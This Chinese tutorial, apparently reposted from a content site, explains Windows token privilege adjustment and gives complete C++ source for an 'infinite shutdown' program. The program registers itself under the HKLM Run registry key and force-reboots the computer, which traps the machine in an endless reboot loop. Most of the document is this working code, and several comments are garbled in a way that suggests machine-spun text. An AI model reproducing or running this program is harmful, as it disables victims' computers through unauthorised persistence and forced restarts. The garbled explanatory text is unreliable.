提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges
我们用下面这个MSDN的代码来做一个注册表无穷关机的列子
#include <windows.h> #pragma comment(lib, "user32.lib") #pragma comment(lib, "advapi32.lib") BOOL MySystemShutdown() { HANDLE hToken; TOKEN_PRIVILEGES tkp; // Get a token for this process. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return( FALSE ); // Get the LUID for the shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get the shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); if (GetLastError() != ERROR_SUCCESS) return FALSE; // Shut down the system and force all applications to close. if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED)) return FALSE; //shutdown was successful return TRUE; }
上面是MSDN的代码,下面给出无穷关机的代码(含细致解释)
// shutdownDemo.cpp : 定义控制台应用程序的进口点。 // #include "stdafx.h" #include <windows.h> BOOL MySystemShutdown() { HANDLE hToken; //用于操纵的句柄 TOKEN_PRIVILEGES tkp; //用于寄存特定信息 // Get a token for this process. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return(FALSE); // Get the LUID for the shutdown privilege. //假如要提权的话要在下面这两个函数提权 LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get the shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); if (GetLastError() != ERROR_SUCCESS) return FALSE; // Shut down the system and force all applications to close. if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED)) return FALSE; //shutdown was successful return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { getchar(); HKEY hKey = { 0 }; /*LONG RegOpenKeyEx( HKEY hKey, // 须要翻开的主键的称号 LPCTSTR lpSubKey, //须要翻开的子键的称号 DWORD ulOptions, // 保存,设为0 REGSAM samDesired, // 平安接见标记,也就是权限 PHKEY phkResult // 获得的将要翻开键的句柄 )*/ RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //翻开一个指定的注册表键 char path[MAX_PATH] = { 0 }; GetModuleFileNameA(nullptr, path, MAX_PATH); //猎取当前文件途径 RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path)); MySystemShutdown(); return 0; }
假如涌现下面题目
请修正字符集以下
下面看看运转效果!
以上就是 C/C++无穷关机(提权例子)的内容,更多相关内容请关注ki4网(www.ki4.cn)!